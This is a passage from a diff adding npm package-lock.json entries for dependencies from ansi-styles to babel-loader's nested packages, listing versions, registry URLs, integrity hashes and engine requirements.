"sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dev": true, + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/ansi-styles/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dev": true, + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/ansi-styles/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", + "dev": true + }, + "node_modules/anymatch": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", + "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, + "dependencies": { + "normalize-path": "^3.0.0", + "picomatch": "^2.0.4" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/append-field": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", + "integrity": "sha1-HjRA6RXwsSA9I3SOeO3XubW0PlY=" + }, + "node_modules/aproba": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/aproba/-/aproba-1.2.0.tgz", + "integrity": "sha512-Y9J6ZjXtoYh8RnXVCMOU/ttDmk1aBjunq9vO0ta5x85WDQiQfUF9sIPBITdbiiIVcBo03Hi3jMxigBtsddlXRw==" + }, + "node_modules/arch": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/arch/-/arch-2.2.0.tgz", + "integrity": "sha512-Of/R0wqp83cgHozfIYLbBMnej79U/SVGOOyuB3VVFv1NRM/PSFMK12x9KVtiYzJqmnU5WR2qp0Z5rHb7sWGnFQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/archiver": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/archiver/-/archiver-5.3.2.tgz", + "integrity": "sha512-+25nxyyznAXF7Nef3y0EbBeqmGZgeN/BxHX29Rs39djAfaFalmQ89SE6CWyDCHzGL0yt/ycBtNOmGTW0FyGWNw==", + "dependencies": { + "archiver-utils": "^2.1.0", + "async": "^3.2.4", + "buffer-crc32": "^0.2.1", + "readable-stream": "^3.6.0", + "readdir-glob": "^1.1.2", + "tar-stream": "^2.2.0", + "zip-stream": "^4.1.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/archiver-utils": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/archiver-utils/-/archiver-utils-2.1.0.tgz", + "integrity": "sha512-bEL/yUb/fNNiNTuUz979Z0Yg5L+LzLxGJz8x79lYmR54fmTIb6ob/hNQgkQnIUDWIFjZVQwl9Xs356I6BAMHfw==", + "dependencies": { + "glob": "^7.1.4", + "graceful-fs": "^4.2.0", + "lazystream": "^1.0.0", + "lodash.defaults": "^4.2.0", + "lodash.difference": "^4.5.0", + "lodash.flatten": "^4.4.0", + "lodash.isplainobject": "^4.0.6", + "lodash.union": "^4.6.0", + "normalize-path": "^3.0.0", + "readable-stream": "^2.0.0" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/archiver-utils/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/archiver-utils/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/archiver-utils/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/are-we-there-yet": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-2.0.0.tgz", + "integrity": "sha512-Ci/qENmwHnsYo9xKIcUJN5LeDKdJ6R1Z1j9V/J5wyq8nh/mYPEpIKJbBZXtZjG04HiK7zV/p6Vs9952MrMeUIw==", + "dependencies": { + "delegates": "^1.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/args-js": { + "version": "0.10.12", + "resolved": "https://registry.npmjs.org/args-js/-/args-js-0.10.12.tgz", + "integrity": "sha1-oyeuqA5BByo9hfnCdNtlEeuV5Jw=", + "engines": { + "node": ">0.8.0", + "npm": ">1.1.0" + } + }, + "node_modules/aria-query": { + "version": "5.1.3", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.1.3.tgz", + "integrity": "sha512-R5iJ5lkuHybztUfuOAznmboyjWq8O6sqNqtK7CLOqdydi54VNbORp49mb14KbWgG1QD3JFO9hJdZ+y4KutfdOQ==", + "dev": true, + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/arr-diff": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/arr-diff/-/arr-diff-4.0.0.tgz", + "integrity": "sha512-YVIQ82gZPGBebQV/a8dar4AitzCQs0jjXwMPZllpXMaGjXPYVUawSxQrRsjhjupyVxEvbHgUmIhKVlND+j02kA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/arr-flatten": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/arr-flatten/-/arr-flatten-1.1.0.tgz", + "integrity": "sha512-L3hKV5R/p5o81R7O02IGnwpDmkp6E982XhtbuwSe3O4qOtMMMtodicASA1Cny2U+aCXcNpml+m4dPsvsJ3jatg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/arr-union": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/arr-union/-/arr-union-3.1.0.tgz", + "integrity": "sha512-sKpyeERZ02v1FeCZT8lrfJq5u6goHCtpTAzPwJYe7c8SPFOboNjNg1vz2L4VTn9T4PQxEx13TbXLmYUcS6Ug7Q==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-buffer-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/array-buffer-byte-length/-/array-buffer-byte-length-1.0.1.tgz", + "integrity": "sha512-ahC5W1xgou+KTXix4sAO8Ki12Q+jf4i0+tmk3sC+zgcynshkHxzpXdImBehiUYKKKDwvfFiJl1tZt6ewscS1Mg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "is-array-buffer": "^3.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-flatten": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "integrity": "sha1-ml9pkFGx5wczKPKgCJaLZOopVdI=" + }, + "node_modules/array-from": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/array-from/-/array-from-2.1.1.tgz", + "integrity": "sha1-z+nYwmYoudxa7MYqn12PHzUsEZU=", + "dev": true + }, + "node_modules/array-includes": { + "version": "3.1.6", + "resolved": "https://registry.npmjs.org/array-includes/-/array-includes-3.1.6.tgz", + "integrity": "sha512-sgTbLvL6cNnw24FnbaDyjmvddQ2ML8arZsgaJhoABMoplz/4QRhtrYS+alr1BUM1Bwp6dhx8vVCBSLG+StwOFw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "get-intrinsic": "^1.1.3", + "is-string": "^1.0.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-union": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-1.0.2.tgz", + "integrity": "sha1-mjRBDk9OPaI96jdb5b5w8kd47Dk=", + "dependencies": { + "array-uniq": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-uniq": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/array-uniq/-/array-uniq-1.0.3.tgz", + "integrity": "sha1-r2rId6Jcx/dOBYiUdThY39sk/bY=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-unique": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/array-unique/-/array-unique-0.3.2.tgz", + "integrity": "sha512-SleRWjh9JUud2wH1hPs9rZBZ33H6T9HOiL0uwGnGx9FpE6wKGyfWugmbkEOIs6qWrZhg0LWeLziLrEwQJhs5mQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array.prototype.flat": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/array.prototype.flat/-/array.prototype.flat-1.2.5.tgz", + "integrity": "sha512-KaYU+S+ndVqyUnignHftkwc58o3uVU1jzczILJ1tN2YaIZpFIKBiP/x/j97E5MVPsaCloPbqWLB/8qCTVvT2qg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.flatmap": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/array.prototype.flatmap/-/array.prototype.flatmap-1.3.1.tgz", + "integrity": "sha512-8UGn9O1FDVvMNB0UlLv4voxRMze7+FpHyF5mSMRjWHUMlpoDViniy05870VlxhfgTnLbpuwTzvD76MTtWxB/mQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "es-shim-unscopables": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.tosorted": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array.prototype.tosorted/-/array.prototype.tosorted-1.1.1.tgz", + "integrity": "sha512-pZYPXPRl2PqWcsUs6LOMn+1f1532nEoPTYowBtqLwAW+W8vSVhkIGnmOX1t/UQjD6YGI0vcD2B1U7ZFGQH9jnQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "es-shim-unscopables": "^1.0.0", + "get-intrinsic": "^1.1.3" + } + }, + "node_modules/arraybuffer.prototype.slice": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/arraybuffer.prototype.slice/-/arraybuffer.prototype.slice-1.0.3.tgz", + "integrity": "sha512-bMxMKAjg13EBSVscxTaYA4mRc5t1UAXa2kXiGTNfZ079HIWXEkKmkgFrh/nJqamaLSrXO5H4WFFkPEaLJWbs3A==", + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.1", + "call-bind": "^1.0.5", + "define-properties": "^1.2.1", + "es-abstract": "^1.22.3", + "es-errors": "^1.2.1", + "get-intrinsic": "^1.2.3", + "is-array-buffer": "^3.0.4", + "is-shared-array-buffer": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/arrify": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz", + "integrity": "sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==", + "engines": { + "node": ">=8" + } + }, + "node_modules/asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" + }, + "node_modules/asn1": { + "version": "0.2.6", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", + "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "license": "MIT", + "dependencies": { + "safer-buffer": "~2.1.0" + } + }, + "node_modules/assert-never": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/assert-never/-/assert-never-1.2.1.tgz", + "integrity": "sha512-TaTivMB6pYI1kXwrFlEhLeGfOqoDNdTxjCdwRfFFkEA30Eu+k48W34nlok2EYWJfFFzqaEmichdNM7th6M5HNw==" + }, + "node_modules/assert-plus": { + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-0.1.5.tgz", + "integrity": "sha1-7nQAlBMALYTOxyGcasgRgS5yMWA=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/assertion-error": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-1.1.0.tgz", + "integrity": "sha512-jgsaNduz+ndvGyFt3uSuWqvy4lCnIJiovtouQN5JZHOKCS2QuhEdbcQHFhVksz2N2U9hXJo8odG7ETyWlEeuDw==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/assign-symbols": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assign-symbols/-/assign-symbols-1.0.0.tgz", + "integrity": "sha512-Q+JC7Whu8HhmTdBph/Tq59IoRtoy6KAm5zzPv00WdujX82lbAL8K7WVjne7vdCsAmbF4AYaDOPyO3k0kl8qIrw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/ast-types": { + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.16.1.tgz", + "integrity": "sha512-6t10qk83GOG8p0vKmaCr8eiilZwO171AvbROMtvvNiwrTly62t+7XkA8RdIIVbpMhCASAsxgAzdRSwh6nw/5Dg==", + "dev": true, + "dependencies": { + "tslib": "^2.0.1" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/ast-types-flow": { + "version": "0.0.7", + "resolved": "https://registry.npmjs.org/ast-types-flow/-/ast-types-flow-0.0.7.tgz", + "integrity": "sha1-9wtzXGvKGlycItmCw+Oef+ujva0=", + "dev": true + }, + "node_modules/astral-regex": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", + "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/async": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", + "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==" + }, + "node_modules/async-lock": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/async-lock/-/async-lock-1.4.1.tgz", + "integrity": "sha512-Az2ZTpuytrtqENulXwO3GGv1Bztugx6TT37NIo7imr/Qo0gsYiGtSdBa2B6fsXhTpVZDNfu1Qn3pk531e3q+nQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/async-retry": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz", + "integrity": "sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==", + "dependencies": { + "retry": "0.13.1" + } + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" + }, + "node_modules/at-least-node": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/at-least-node/-/at-least-node-1.0.0.tgz", + "integrity": "sha512-+q/t7Ekv1EDY2l6Gda6LLiX14rU9TV20Wa3ofeQmwPFZbOMo9DXrLbOjFaaclkXKWidIaopwAObQDqwWtGUjqg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/atob": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/atob/-/atob-2.1.2.tgz", + "integrity": "sha512-Wm6ukoaOGJi/73p/cl2GvLjTI5JM1k/O14isD73YML8StrH/7/lRFgmg8nICZgD3bZZvjwCGxtMOD3wWNAu8cg==", + "dev": true, + "bin": { + "atob": "bin/atob.js" + }, + "engines": { + "node": ">= 4.5.0" + } + }, + "node_modules/auth0-id-generator": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/auth0-id-generator/-/auth0-id-generator-0.2.0.tgz", + "integrity": "sha512-sJVZrGls/XB7TEsAovv6GsGwsjDBhBy014w+9x/DNZH8OTV8F/uioMmT68ADWtfbvfkJaNCYNjRs1dOVFyNqbQ==" + }, + "node_modules/autoprefixer": { + "version": "10.4.16", + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.16.tgz", + "integrity": "sha512-7vd3UC6xKp0HLfua5IjZlcXvGAGy7cBAXTg2lyQ/8WpNhd6SiZ8Be+xm3FyBSYJx5GKcpRCzBh7RH4/0dnY+uQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/autoprefixer" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "browserslist": "^4.21.10", + "caniuse-lite": "^1.0.30001538", + "fraction.js": "^4.3.6", + "normalize-range": "^0.1.2", + "picocolors": "^1.0.0", + "postcss-value-parser": "^4.2.0" + }, + "bin": { + "autoprefixer": "bin/autoprefixer" + }, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/available-typed-arrays": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/available-typed-arrays/-/available-typed-arrays-1.0.7.tgz", + "integrity": "sha512-wvUjBtSGN7+7SjNpq/9M2Tg350UZD3q62IFZLbRAR1bSMlCo1ZaeW+BJ+D090e4hIIZLBcTDWe4Mh4jvUDajzQ==", + "license": "MIT", + "dependencies": { + "possible-typed-array-names": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/aws-sdk": { + "version": "2.1358.0", + "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1358.0.tgz", + "integrity": "sha512-ZolqFlnm0mDNgub7FGrVi7r5A1rw+58zZziKhlis3IxOtIpHdx4BQU5pH4htAMuD0Ct557p/dC/wmnZH/1Rc9Q==", + "dependencies": { + "buffer": "4.9.2", + "events": "1.1.1", + "ieee754": "1.1.13", + "jmespath": "0.16.0", + "querystring": "0.2.0", + "sax": "1.2.1", + "url": "0.10.3", + "util": "^0.12.4", + "uuid": "8.0.0", + "xml2js": "0.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/aws-sdk/node_modules/uuid": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", + "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/aws-sdk/node_modules/xml2js": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", + "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/aws-sdk/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/aws-sign2": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", + "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", + "engines": { + "node": "*" + } + }, + "node_modules/aws4": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", + "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + }, + "node_modules/axe-core": { + "version": "4.7.1", + "resolved": "https://registry.npmjs.org/axe-core/-/axe-core-4.7.1.tgz", + "integrity": "sha512-sCXXUhA+cljomZ3ZAwb8i1p3oOlkABzPy08ZDAoGcYuvtBPlQ1Ytde129ArXyHWDhfeewq7rlx9F+cUx2SSlkg==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/axios": { + "version": "1.8.4", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.8.4.tgz", + "integrity": "sha512-eBSYY4Y68NNlHbHBMdeDmKNtDgXWhQsJcGqzO3iLUM0GraQFSS9cVgPX5I9b3lbdFKyYoAEGAZF1DwhTaljNAw==", + "license": "MIT", + "dependencies": { + "follow-redirects": "^1.15.6", + "form-data": "^4.0.0", + "proxy-from-env": "^1.1.0" + } + }, + "node_modules/axios/node_modules/proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" + }, + "node_modules/axobject-query": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/axobject-query/-/axobject-query-3.1.1.tgz", + "integrity": "sha512-goKlv8DZrK9hUh975fnHzhNIO4jUnFCfv/dszV5VwUGDFjI6vQ2VwoyjYjYNEbBE8AH87TduWP5uyDR1D+Iteg==", + "dev": true, + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" + }, + "node_modules/babel-core": { + "version": "7.0.0-bridge.0", + "resolved": "https://registry.npmjs.org/babel-core/-/babel-core-7.0.0-bridge.0.tgz", + "integrity": "sha512-poPX9mZH/5CSanm50Q+1toVci6pv5KSRv/5TWCwtzQS5XEwn40BcCrgIeMFWP9CKKIniKXNxoIOnOq4VVlGXhg==", + "dev": true, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/babel-loader": { + "version": "9.2.1", + "resolved": "https://registry.npmjs.org/babel-loader/-/babel-loader-9.2.1.tgz", + "integrity": "sha512-fqe8naHt46e0yIdkjUZYqddSXfej3AHajX+CSO5X7oy0EmPc6o5Xh+RClNoHjnieWz9AW4kZxW9yyFMhVB1QLA==", + "dev": true, + "license": "MIT", + "dependencies": { + "find-cache-dir": "^4.0.0", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "peerDependencies": { + "@babel/core": "^7.12.0", + "webpack": ">=5" + } + }, + "node_modules/babel-loader/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/babel-loader/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/babel-loader/node_modules/find-cache-dir": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-4.0.0.tgz", + "integrity": "sha512-9ZonPT4ZAK4a+1pUPVPZJapbi7O5qbbJPdYw/NOQWZZbVLdDTYM3A4R9z/DpAM08IDaFGsvPgiGZ82WEwUDWjg==", + "dev": true, + "dependencies": { + "common-path-prefix": "^3.0.0", + "pkg-dir": "^7.0.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/find-up": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-6.3.0.tgz", + "integrity": "sha512-v2ZsoEuVHYy8ZIlYqwPe/39Cy+cFDzp4dXPaxNvkEuouymu+2Jbz0PxpKarJHYJTmv2HWT3O382qY8l4jMWthw==", + "dev": true, + "dependencies": { + "locate-path": "^7.1.0", + "path-exists": "^5.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/babel-loader/node_modules/locate-path": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-7.2.0.tgz", + "integrity": "sha512-gvVijfZvn7R+2qyPX8mAuKcFGDf6Nc61GdvGafQsHL0sBIxfKzA+usWn4GFC/bk+QdwPUD4kWFJLhElipq+0VA==", + "dev": true, + "dependencies": { + "p-locate": "^6.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/p-limit": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-4.0.0.tgz", + "integrity": "sha512-5b0R4txpzjPWVw/cXXUResoD4hb6U/x9BH08L7nw+GN1sezDzPdxeRvpc9c433fZhBan/wusjbCsqwqm4EIBIQ==", + "dev": true, + "dependencies": { + "yocto-queue": "^1.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/p-locate": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-6.0.0.tgz", + "integrity": "sha512-wPrq66Llhl7/4AGC6I+cqxT07LhXvWL08LNXz1fENOw0Ap4sRZZ/gZpTTJ5jpurzzzfS2W/Ge9BY3LgLjCShcw==", + "dev": true, + "dependencies": { + "p-limit": "^4.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/path-exists": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-5.0.0.tgz", + "integrity": 